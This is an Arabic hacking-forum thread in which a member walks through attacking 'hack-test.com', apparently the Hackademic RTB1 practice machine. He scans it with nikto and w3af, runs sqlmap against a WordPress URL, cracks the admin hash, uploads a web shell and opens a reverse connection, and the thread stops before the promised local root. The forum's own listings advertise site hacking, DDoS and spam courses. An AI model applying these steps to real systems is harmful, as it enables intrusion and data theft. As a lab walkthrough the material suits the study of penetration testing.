تذكرنــي
التسجيل التعليمات التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة



::. قسم مشروع الباك تراك backtrack , الميتاسبلويت MetaSploit .:: قسم يهتم بشروحات مشروع الباك تراك backtrack , الميتاسبلويت MetaSploit

اضافة رد

 
أدوات الموضوع انواع عرض الموضوع

رقم المشاركة : ( 1 )
الصورة الرمزية abdulhakim1
abdulhakim1
v!p
abdulhakim1 غير متواجد حالياً
 
رقم العضوية : 27548
تاريخ التسجيل : Apr 2012
مكان الإقامة :
عدد المشاركات : 521
عدد النقاط : 10
قوة التقييم :
اهل سنت پاکستان
افتراضي استهداف موقع :فحصة :اختراقة والتطبيق على : hack-test.com

كُتب : [ 08-18-2012 - 04:49 PM ]



اليوم ياخوان راح نشرح باذن الله

فحص الهدف من الثغرات وحصول ثغرة sql
واستغلالها ورفع الشل وسحب روت :
الهدف :
hack-test.com


في البداية نتجى لم مجلد اداة nikto


بلباك تراك :/pentest/web/nikto


بدعها نفحص الهدف:

perl nikto.pl -h http://hack-test.com



كود:
+ Target IP: 192.168.1.2 + Target Hostname: hack-test.com + Target Port: 80 + Start Time: 2011-12-29 06:50:03 --------------------------------------------------------------------------- + Server: Apache/2.2.15 (Fedora) + ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b + Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 6448 items checked: 1 error(s) and 6 item(s) reported on remote host + End Time: 2011-12-29 06:50:37 (34 seconds)
نجمع معلومات عن الهدف:

بعد الانتهاء

نروح لم اداة
w3af
الكل عارفها:
مجلد الاداة
/pentest/web/w3af

بعد دخولنا للمجد :

نشغل البرنامج

./w3af_gui






الان بعد مانتهينا من الفحص



خرجت لنا الثغرات :
اخترقنا ثغرة sql


مثل ماهو موضح قدامك :ماكن الاصابة



طيب الحين نتوجة لم الاداة المعروفة :
sqlmap

نعطية امر :
sqlmap.py -u http://www.hack-test.com/Hackademic_RTB1/?cat=1

لستغلال الثغرة



معروف انو جدول اليوزر في سكريبت وريد بريس هو
wp_user



مثل ماشفتو تم استخراج الجداول:


ومثل ماشفتو تم سحب باسورد الادمن :
الحين نروح نكسر الهاش من الموقع
http://www.onlinehashcrack.com/free-hash-reverse.php




الحين نروح نخش الوحة


نرفع الشل







تم رفع الشل بنجاح




عملنا اتصال عكسي



نشوف صلاحيتنا :id

uid=48(apache) gid=489(apache) groups=489(apache)


مسارنا : pwd


/var/www/html/Hackademic_RTB1/wp-content/plugins


uname -a


اصدال الكيرنل


Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux




الحين نروح نسحب لوكل روت :عشان نسحب روت



توقيع : abdulhakim1

m0slem hack3r

رد مع إقتباس
3 أعضاء آرسلو آعجاب لـ abdulhakim1 على المشاركة المفيدة:
الشهاب العراقي (04-17-2013), logic bugzer (02-23-2014), xarmax (05-09-2013)
بياناتي
 رقم المشاركة : ( 2 )
HACKER IRAGI

رقم العضوية : 25474
تاريخ التسجيل : Jan 2012
مكان الإقامة :
عدد المشاركات : 265
عدد النقاط : 10

HACKER IRAGI غير متواجد حالياً

افتراضي

كُتب : [ 08-18-2012 - 05:01 PM ]


مشكورين اخي في ميزان حسناتك


توقيع : HACKER IRAGI

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 3 )
aywanvictori
مشرف
رقم العضوية : 13543
تاريخ التسجيل : Sep 2010
مكان الإقامة :
عدد المشاركات : 944
عدد النقاط : 10

aywanvictori غير متواجد حالياً

افتراضي

كُتب : [ 08-18-2012 - 11:06 PM ]


يا سلام شرح رائع


توقيع : aywanvictori

شكرا رووح
كل انجازاتي اهديها ل كاسبر جزائر مارڤيل ليون ليتو بلاك روز وكل من ساهم في تكويني

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 4 )
hamdix
v!p
رقم العضوية : 21564
تاريخ التسجيل : Aug 2011
مكان الإقامة :
عدد المشاركات : 1,450
عدد النقاط : 10

hamdix غير متواجد حالياً

افتراضي

كُتب : [ 08-19-2012 - 03:40 AM ]


مشكور أخي نرجو كذلك ذكر الحقوق

توقيع : hamdix

قادمون يا قدس بإذن الله




رد مع إقتباس
بياناتي
 رقم المشاركة : ( 5 )
morphus

رقم العضوية : 10639
تاريخ التسجيل : Jul 2010
مكان الإقامة :
عدد المشاركات : 22
عدد النقاط : 10

morphus غير متواجد حالياً

افتراضي

كُتب : [ 08-22-2012 - 04:50 AM ]


بــارك الله فيك


توقيع : morphus

.:: فريق قراصنة غزة ::.

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 6 )
monder

رقم العضوية : 23622
تاريخ التسجيل : Nov 2011
مكان الإقامة :
عدد المشاركات : 122
عدد النقاط : 10

monder غير متواجد حالياً

Dr_h0uCk

افتراضي

كُتب : [ 08-24-2012 - 08:50 PM ]


باركة الله فيك


توقيع : monder

.:: فريق قراصنة غزة ::.

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 7 )
llord
مشرف
رقم العضوية : 26569
تاريخ التسجيل : Mar 2012
مكان الإقامة :
عدد المشاركات : 1,076
عدد النقاط : 10

llord غير متواجد حالياً

افتراضي

كُتب : [ 08-24-2012 - 09:10 PM ]


مشكور أخي بارك الله فيك

لا تحرمنا من جديدك

توقيع : llord


qJJI Jgω∫ ɔρζρ qJJI ƔĮ qJĮ Ɣ

رد مع إقتباس

اضافة رد

العلامات المرجعية

الكلمات الدلالية (Tags)
موقع, اختراقة, استهداف, hacktestcom, علي, فحصة, والتطبيق


يتصفح الموضوع حالياً : 1 (0 قرصان و 1 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
قرآصنة غزهـ / إختراق موقع صحيفة هأرتس اليوميه الصهيونيه haaretz daily Casper قسم الانجازات 50 04-09-2015 11:16 AM
حقائق وأرقام مذهلة عن موقع يوتيوب! قراصنة غزة :: YouTube :: 28 10-01-2014 05:25 PM
152 مواقع العاب رائعة David Hacker قسم الالعاب الالكترونية 6 08-13-2013 02:47 PM
دولة العراق الإسلامية / تقريرٌ بالعمليات العسكرية الموثّقة لولاية الشّمال وكركوك قراصنة غزة قسم اخبار العالم وقضايا الأمة الإسلامية 1 07-02-2012 03:10 PM
استهداف موقع :فحصة :اختراقة ابوللة ::. قسم إختراق المواقع والمنتديات .:: 10 02-24-2012 05:04 PM


جميع الأوقات بتوقيت GMT +2. الساعة الآن 07:09 AM.



أقسام المنتدى

الأقسام الإسلامية @ .:: القسم الإسلامي العام ::. @ .:: قسم القرآن الكريم وتجويده ::. @ .:: قسم الاناشيد والشريط الاسلامي ::. @ .:: سيرة و قصص الأنبياء و الصحابة ::. @ الأقسام العامة @ .:: قسم الساحة العامة ::. @ .:: قسم فـلـسـطــيــن ::. @ .:: قسم للتوعية الأمنية ::. @ .:: عالم البرامج الكاملة والنادرة ::. @ .:: قسم أخبار التقنية المعلوماتية والتكنولوجية ::. @ .:: قسم عالم المحادثة ::. @ .:: قسم الأمن و الحماية | Security ::. @ ::. قسم حماية الاجهزة والايميلات .:: @ ::. قسم حمايه المواقع والسيرفرات.:: @ ::. قسم إختراق المواقع والأجهزة والبريد الإلكتروني | Hacker .:: @ ::. قسم إختراق المواقع والمنتديات .:: @ ::.قسم إختراق الأجهزه والبريد الاكتروني .:: @ .:: قسم الثغرات ::. @ .:: الركن الترفيهي ::. @ .:: قسم الصور ::. @ .:: ركن الأدارية ::. @ .:: قسم الشكاوي ولأقتراحات ::. @ خاص بشروحات الفيديو @ الأدوات , hack tools @ .:: قسم مساعدة الاعضاء ::. @ :: المواضيع المحذوفة :: @ قسم الانجازات @ .:: جديد قراصنة غزة ::. @ :: قسم استراحة الأعضاء :: @ :: YouTube :: @ .:: القسم التقني ::. @ :: عالمـ الكومبيوتر :: @ :: قسم الجوالات والاتصالات :: @ :: قسم التصميم والغرافيك :: @ خاص للادارة والمشرفين @ :: قسم خاص بالمبتدئين :: @ :: خاص بثغرات المتصفح :: @ :: خاص بشروحات الفيديو :: @ .:: الدورات المقدمة من المشرفين ::. @ :: مشآكل الكومبيوتر وحلولها :: @ .:: للنقاش الجاد ::. @ الملتقى الأدبي .. @ :: طلبات الإشراف :: @ :: كتب الحماية والاختراق security&hacking :: @ البحوث العلمية @ تعليم اللغات الأجنبية @ .:: كتب الكترونية منوعة ::. @ .:: القسم الدعوي ::. @ قسم الكتب الاسلامية @ قسم المواضيع المميزة @ :: قسم خاص بالتشفير :: @ قسم اخبار العالم وقضايا الأمة الإسلامية @ Local root @ دورة إحترآف إلـ Spam Email @ فلسطين , palestine @ .:: مدن وقرى فلسطين ::. @ .:: تاريخ فلسطين ::. @ .:: شهداء فلسطين ::. @ .:: مدينة القدس ::. @ .:: مدينة غزة ::. @ .:: لعروض التصاميم ::. @ .:: لدروس التصاميم ::. @ :: قسم اصدارات وانجازات الفريق :: @ .:: قسم قضية فلسطين ::. @ .:: قسم عروض الاستايلات :.. @ قسم اخبار وقضايا اليهود @ .:: قسم الهاكات وتطوير المنتديات ::. @ ::. قسم المسابقات والنشاطات .:: @ لوحة تحكم سي بانل , cPanel Management @ حماية قواعد البيانات mysql , sql @ لوحة تحكم , Plesk Management @ ادارة سيرفرات Linux @ .:: SQL-injection , حقن قواعد بيانات ::. @ :: قسم خاص بالمبتدئين :: @ .:: قسم الكتب الالكترونية E-BOOK ::. @ .:: قسم تفسير القران الكريم ::. @ قسم الدفاع عن النبي محمد والصحابة وآل البيت @ .:: قسم لغات البرمجة ::. @ قسم برمجة لغة Php , Html @ قسم برمجة لغة mysql , sql @ .:: القسم الرمضانى ::. @ جديد الشيخ نبيل العوضى @ حجب الخدمة , ddos attack @ قسم الاختراق المتقدم @ .:: حماية الاجهزة وطرق كشف التلغيم ::. @ .:: قسم حماية الايميلات :. @ قسم اختراق سيرفرات windows @ .:: دورة قراصنة غزة للتصميم ::. @ .::: أسرى فلسطين ::. @ مدرسة قراصنة غزة لحقن قواعد البيانات @ ::. قسم مشروع الباك تراك backtrack , الميتاسبلويت MetaSploit .:: @ فريق :: Gaza HaCker Injector Team-GHI :: @ دورة أساتذة حقن قواعد البيانات المتقدمة لعام 2017 / 2018 @ GH-InjeCtor-Team @ .:: قسم الصلاة ثم الصلاة ::. @ وَحَرِّضِ الْمُؤْمِنِينَ @ قسم انظمة لينكس Linux, Unix @ قسم الالعاب الالكترونية @ قسم اختراق الشبكات السلكية واللاسلكية @ قسم الميكاترونكس (بناء الروبوتات) @ قسم الدورات المدفوعة @ قسم اختراق الاجهزة اللوحية @ دورات حقن قواعد البيانات للمٌبتدئين من الألف إلى الإحتراف @ قسم الحقن المٌتقَدِّم [بداية العهد] @